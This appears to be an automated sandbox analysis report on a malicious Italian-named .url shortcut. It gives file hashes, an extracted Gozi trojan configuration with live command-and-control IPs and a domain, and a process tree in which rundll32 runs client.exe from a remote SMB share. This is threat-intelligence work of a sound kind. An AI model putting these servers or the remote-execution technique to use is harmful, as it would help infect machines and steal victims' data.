Analysis
-
max time kernel
142s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
03-10-2023 13:24
Static task
static1
Behavioral task
behavioral1
Sample
Informazioni.url
Resource
win7-20230831-en
windows7-x64
1 signatures
150 seconds
General
-
Target
Informazioni.url
-
Size
192B
-
MD5
c6c6f5a3d3e0444820d2865c7f1a07bc
-
SHA1
5f9c9620e315b09802e8e532f48195a9e60f2d2c
-
SHA256
59944e8c11bfc2d065ef88fca0a033313361ae424962c34573755da99badbf3f
-
SHA512
4a1a66efff8336bbde327c9256e6e473193c901bc47d1b7648bbfa29212490f3f47092ba060c47cc77a1e6952f6bf814346045d2d1c1eef556ba07d08f69c628
Malware Config
Extracted
Family
gozi
Extracted
Family
gozi
Botnet
5050
C2
185.247.184.139
62.72.33.155
incontroler.com
Attributes
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
rsa_pubkey.plain
aes.plain
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4860 1072 WerFault.exe client.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
rundll32.exedescription pid process target process PID 3968 wrote to memory of 1072 3968 rundll32.exe client.exe PID 3968 wrote to memory of 1072 3968 rundll32.exe client.exe PID 3968 wrote to memory of 1072 3968 rundll32.exe client.exe
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Informazioni.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
\??\UNC\62.173.146.46\scarica\client.exe"\\62.173.146.46\scarica\client.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1072 -s 5763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1072 -ip 10721⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1072-1-0x0000000002410000-0x0000000002510000-memory.dmpFilesize
1024KB
-
memory/1072-2-0x0000000003FD0000-0x0000000003FDB000-memory.dmpFilesize
44KB
-
memory/1072-3-0x0000000000400000-0x0000000002290000-memory.dmpFilesize
30.6MB
-
memory/1072-4-0x0000000004030000-0x000000000403D000-memory.dmpFilesize
52KB
-
memory/1072-7-0x0000000000400000-0x0000000002290000-memory.dmpFilesize
30.6MB
-
memory/1072-8-0x0000000002410000-0x0000000002510000-memory.dmpFilesize
1024KB
-
memory/1072-9-0x0000000003FD0000-0x0000000003FDB000-memory.dmpFilesize
44KB
-
memory/1072-13-0x0000000000400000-0x0000000002290000-memory.dmpFilesize
30.6MB